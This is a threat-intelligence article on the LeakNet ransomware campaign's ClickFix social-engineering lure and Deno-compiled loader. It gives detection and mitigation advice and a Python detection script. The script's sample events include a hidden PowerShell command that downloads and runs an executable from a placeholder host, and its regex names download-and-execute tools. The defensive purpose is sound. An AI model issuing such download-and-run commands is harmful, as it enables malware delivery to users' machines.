LeakNet Ransomware: Stealthy Exploitation via Deno and ClickFix
- [01] Immediate impact: LeakNet ransomware targets corporate users via social engineering to deploy stealthy loaders that bypass standard detection tools.
- [02] Affected systems: Windows environments are at risk when users are lured into executing malicious PowerShell commands through browser-based error overlays.
- [03] Remediation: Restrict PowerShell execution via Group Policy and monitor for unauthorized standalone binaries generated by the Deno runtime compiler.
Overview of LeakNet Ransomware Tactics
The LeakNet ransomware group has significantly refined its TTPs by combining the ClickFix social engineering technique with a loader built on the Deno runtime. According to BleepingComputer, this transition marks a shift toward less common execution environments in order to evade EDR and other signature-based security controls. By using Deno, a secure-by-default runtime for JavaScript and TypeScript, the attackers can package malicious scripts into standalone executables that appear legitimate to many heuristic scanners.
This campaign primarily targets corporate employees, using deceptive browser overlays to trick users into compromising their own systems. The choice of a relatively niche runtime complicates malware analysis for many SOC teams, because existing detection rules often focus on more common engines such as Node.js or the native Windows Script Host.
Technical Analysis: ClickFix to Deno Loader
The attack chain begins with phishing or compromised websites that host the ClickFix overlay. This technique presents the user with a fake browser error, such as a missing root certificate or a connectivity failure, and provides a “Fix” button. When clicked, the button copies a malicious PowerShell command to the user’s clipboard and instructs them to paste and run it in a terminal or the Windows ‘Run’ dialog.
The ClickFix Initial Access Vector
The success of ClickFix relies on the psychological pressure of a technical failure. Once the user executes the PowerShell script, it initiates a series of actions:
- Environment Validation: The script checks for the presence of specific security tools or sandbox environments.
- Payload Retrieval: It reaches out to a C2 server to download the Deno-based loader.
- Persistence: The loader may establish persistence through registry modifications or scheduled tasks.
This method bypasses traditional email filters because the initial interaction occurs entirely within the browser DOM and relies on manual user execution rather than a direct file download that might be flagged by a gateway.
Deno Runtime Malware Analysis: A New Stealth Frontier
LeakNet’s choice of Deno is tactical. Deno allows developers to compile scripts into single, self-contained executable files using the `deno compile` command. For an attacker, this means the entire runtime can be bundled with the malicious script. Because Deno is not natively installed on most corporate workstations, its presence and activity may not be covered by detection content mapped to MITRE ATT&CK techniques for PowerShell or .NET-based threats.
Analysts have observed the loader performing information theft and environment reconnaissance before deploying the final ransomware payload. The loader manages network communications over HTTPS, often mimicking legitimate API traffic to blend in with normal web activity. To counter these threats effectively, security teams must be able to detect ClickFix attempts by monitoring for clipboard-to-shell execution patterns.
Detection and Remediation Strategies
Defending against LeakNet requires a multi-layered approach that addresses both the social engineering aspect and the technical execution phase. Organizations should prioritize visibility into shell activity and user-space executions.
LeakNet Ransomware Mitigation Steps
To reduce the risk of infection, SOC teams should implement the following controls:
- PowerShell Constrained Language Mode: Enforce Constrained Language Mode to limit the functionality of scripts executed by end-users, which can break the functionality of the ClickFix payload.
- Endpoint Monitoring: Configure SIEM alerts for any instance where a browser process (e.g., `chrome.exe`, `msedge.exe`) is the parent process of `powershell.exe` or `cmd.exe` when accompanied by unusual command-line arguments.
- Binary Whitelisting: Use AppLocker or Windows Defender Application Control (WDAC) to prevent the execution of unrecognized standalone binaries in `%APPDATA%` or `%TEMP%` directories, where Deno-compiled loaders are typically dropped.
- User Training: Educate staff on the risks of “copy-paste” troubleshooting steps. Genuine browser updates or certificate fixes never require a user to manually run PowerShell commands provided by a website.
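As an added example (not code from the page or from any vendor), the Endpoint Monitoring and Binary Whitelisting controls above expressed as detection logic over constructed Sysmon-style process-creation records. The argument heuristics, the `KNOWN_GOOD` allowlist and the sample events are assumptions; it also covers the Run-dialog case, where the shell's parent is `explorer.exe` rather than the browser.

```python
import ntpath
import re

BROWSERS = {"chrome.exe", "msedge.exe"}              # parent processes named on the page
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Heuristics for "unusual" shell arguments: assumed here, not taken from the page.
SUSPICIOUS_ARGS = re.compile(
    r"(-e(nc(odedcommand)?|c)?\s|-w(indowstyle)?\s+hidden|-nop\b|"
    r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|curl)\b)", re.I)
# User-writable drop locations named on the page (%APPDATA%, %TEMP%).
DROP_DIRS = re.compile(r"\\AppData\\(Roaming|Local)\\|\\Temp\\", re.I)
KNOWN_GOOD = {"teams.exe"}  # placeholder allowlist for sanctioned per-user installs

def assess(event):
    """Return (rule, severity) findings for one Sysmon-style process-creation event."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    image = ntpath.basename(event["Image"]).lower()
    cmd = event.get("CommandLine", "")
    findings = []
    if image in SHELLS:
        unusual = bool(SUSPICIOUS_ARGS.search(cmd))
        if parent in BROWSERS:
            findings.append(("browser_spawned_shell", "high" if unusual else "medium"))
        elif parent == "explorer.exe" and unusual:
            # The Run dialog spawns the shell from explorer.exe, not the browser; cover it too.
            findings.append(("run_dialog_shell_unusual_args", "medium"))
    if DROP_DIRS.search(event["Image"]) and image not in KNOWN_GOOD:
        findings.append(("unrecognized_binary_in_user_dir", "medium"))
    return findings

# Constructed sample events; paths, domains and commands are illustrative, not real IoCs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -w hidden -c "iwr https://example.invalid/s -OutFile $env:TEMP\ld.exe; & $env:TEMP\ld.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc QQBCAEMA"},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\alice\AppData\Roaming\Updater\ld.exe", "CommandLine": "ld.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(ntpath.basename(event["Image"]), assess(event))
```

A legitimate per-user launch with no suspicious flags (the last sample) produces no finding, so the rules can be tuned against real baseline telemetry before alerting.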
By tracking the IoCs associated with LeakNet infrastructure and monitoring for the distinctive footprint of Deno-compiled binaries, defenders can identify these stealthy intrusions before they escalate to full-scale data encryption.